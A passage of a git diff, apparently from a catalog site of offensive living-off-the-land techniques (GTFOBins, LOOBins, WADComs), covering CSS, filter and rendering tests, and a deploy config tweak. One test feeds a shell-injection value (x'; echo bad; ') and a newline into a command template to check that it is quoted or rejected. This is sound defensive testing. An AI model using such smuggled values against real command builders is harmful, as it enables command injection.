font-size:14px; margin:1.2rem 0 .4rem; }.inspector p,.inspector li { font-size:13px; line-height:1.7; color:var(--fg-dim); }.inspector ul { padding-left:1.2rem; }.inspector a { color:var(--foam); overflow-wrap:anywhere; }.inspector pre { font-size:var(--command-size); overflow:auto; background:#191724; color:#e0def4; padding:.8rem; }.inspector pre code { color:inherit; } +.command-fields { display:grid; gap:.7rem; }.command-fields label { display:grid; gap:.3rem; color:var(--fg-dim); font-size:12px; }.command-fields input { width:100%; box-sizing:border-box; padding:.5rem; background:var(--bg); color:var(--fg); border:1px solid var(--rule); font-family:var(--font-mono); }.inspector .template-error { color:var(--love); } +html[data-motion=reduce] *,html[data-motion=reduce] *::before,html[data-motion=reduce] *::after { animation:none!important; transition:none!important; scroll-behavior:auto!important; } +@media(max-width:1200px) { .workbench__body:has(.inspector:not([hidden])) { grid-template-columns:190px minmax(0,1fr); }.inspector { grid-column:2; grid-row:1; position:relative; top:0; max-height:none; margin:0 0 1rem 1rem; border:1px solid var(--rule); }.workbench__body:has(.inspector:not([hidden])) .workbench__results { grid-column:2; grid-row:2; }.workbench__filters { grid-row:1 / span 2; } } +@media(max-width:760px) { .workbench { padding-top:1.2rem; }.workbench__heading { display:block; }.workbench__stats { margin-top:.8rem; }.workbench__heading h1 { font-size:1.8rem; }.workbench__toolbar [data-filters-toggle] { display:block; }.workbench__body,.workbench__body:has(.inspector:not([hidden])) { display:flex; flex-direction:column; }.workbench__filters { display:none; width:100%; position:static; max-height:none; border:0; }.workbench[data-filters-open=true] .workbench__filters { display:block; }.workbench__results { width:100%; padding:0; }.workbench__result-heading>span { display:none; }.inspector { order:-1; margin:0 0 1rem; width:100%; box-sizing:border-box; }.workbench__toolbar { gap:.5rem; }.workbench .trow__head { grid-template-columns:28px minmax(0,1fr); }.workbench .trow__badges { grid-column:2; justify-content:flex-start; }.trow__variants { align-items:start; flex-direction:column; }.trow__actions { flex-wrap:wrap; }.trow__actions>span { flex-basis:100%; } } diff --git a/test/catalog-workspace.test.mjs b/test/catalog-workspace.test.mjs @@ -0,0 +1,56 @@ +import { test } from 'node:test'; +import assert from 'node:assert/strict'; +import { readFileSync } from 'node:fs'; +import { loadTs } from './_loadts.mjs'; +import { normalizeTechnique, stableId } from '../scripts/enrich-data.mjs'; +import { LIST_FIELDS as indexFields } from '../scripts/build-index.mjs'; +const { configureCommand, quoteArgument, groupTechniques, contextualCounts, sortTechniques } = await loadTs('src/lib/catalog-workspace.ts'); +const { matches, EMPTY_FILTERS, filtersToSearch, filtersFromSearch } = await loadTs('src/lib/techniques.ts'); +const { LIST_FIELDS, renderRow } = await loadTs('src/lib/render-row.ts'); +const row = (over = {}) => ({ id:'a', toolId:'gtfo:vim', toolName:'vim', source:'GTFOBins', command:'vim', platform:['Linux'], capability:['Execution'], nativeCategory:[], mitre:[], references:[], ...over }); + +test('context/access/service/environment filters compose and round-trip', () => { + const t = row({ context:'sudo', requires:['Shell'], services:['SMB'], environment:['Local host'], aliases:['vi'] }); + const f = { ...EMPTY_FILTERS, context:['sudo'], requires:['Shell'], services:['SMB'], environment:['Local host'], query:'vi sudo' }; + assert.equal(matches(t,f),true); assert.deepEqual(filtersFromSearch(filtersToSearch(f)),f); + assert.equal(matches(t,{ ...f, context:['suid'] }),false); + assert.equal(matches(t,{ ...f, query:'vi missing' }),false); +}); +test('facet counts exclude their own facet but retain the other filters', () => { + const rows = [row({context:'sudo'}),row({id:'b',context:'suid'}),row({id:'c',context:'suid',platform:['Windows']})]; + const counts = contextualCounts(rows,{...EMPTY_FILTERS,platform:['Linux'],context:['sudo']}); + assert.deepEqual(counts.context,{sudo:1,suid:1}); assert.deepEqual(counts.platform,{Linux:1}); +}); +test('grouping retains variants and exact tool matches sort first', () => { + const rows = [row(),row({id:'b',context:'sudo'}),row({id:'c',toolId:'daemon:aws',toolName:'aws'})]; + assert.equal(groupTechniques(rows).length,2); assert.equal(groupTechniques(rows)[0].length,2); + assert.equal(sortTechniques(rows,'tool','vim')[0].toolName,'vim'); +}); +test('template variables are quoted as arguments and cannot introduce new lines', () => { + const tpl = {shell:'posix',command:'tool --host {{host}}',variables:[{key:'host',label:'Host',default:'example.test'}]}; + assert.equal(configureCommand(tpl,{}),"tool --host 'example.test'"); + assert.equal(configureCommand(tpl,{host:"x'; echo bad; '"}),"tool --host 'x'\"'\"'; echo bad; '\"'\"''"); + assert.equal(quoteArgument("a'b",'powershell'),"'a''b'"); + assert.throws(()=>configureCommand(tpl,{host:'x\ncommand'})); + assert.throws(()=>configureCommand({...tpl,command:'tool {{missing}}'},{})); +}); +test('list payload retains the fields required by filters and configuration', () => { + assert.deepEqual(LIST_FIELDS,indexFields); + for (const key of ['context','requires','services','environment','template','references']) assert.ok(indexFields.includes(key)); +}); +test('row markup keeps navigation links outside interactive buttons', () => { + const html = renderRow(row()); + for (const button of html.matchAll(/<button\b[^>]*>([\s\S]*?)<\/button>/g)) assert.doesNotMatch(button[1],/<a\b/); +}); +test('normalization removes unverified macOS tags and category pollution', () => { + const t = normalizeTechnique(row({platform:['Linux','macOS'],requires:['Exploitation','powershell','PowerShell','Hash'],services:['Enumeration','SMB']})); + assert.deepEqual(t.platform,['Linux']); assert.deepEqual(t.requires,['PowerShell','NTLM hash']); assert.deepEqual(t.services,['SMB']); + assert.equal(stableId('tool','command'),stableId('tool','command')); +}); +test('committed additions and imported examples carry explicit evidence', () => { + const rows = JSON.parse(readFileSync('src/data/techniques.json')); + const mac = rows.filter(t=>t.source==='LOOBins'); assert.equal(mac.length,183); + assert.ok(mac.every(t=>t.verification==='Upstream reference' && t.references.some(r=>r.includes('/blob/')))); + assert.ok(!rows.some(t=>t.source==='GTFOBins' && t.platform.includes('macOS'))); + assert.equal(JSON.parse(readFileSync('src/data/sources/wadcoms-additions.json')).length,134); +}); diff --git a/wrangler.jsonc b/wrangler.jsonc @@ -4,6 +4,7 @@ "compatibility_date": "2026-09-17", "assets": { "directory": "dist", + "html_handling": "drop-trailing-slash", "not_found_handling": "404-page" }, "routes": [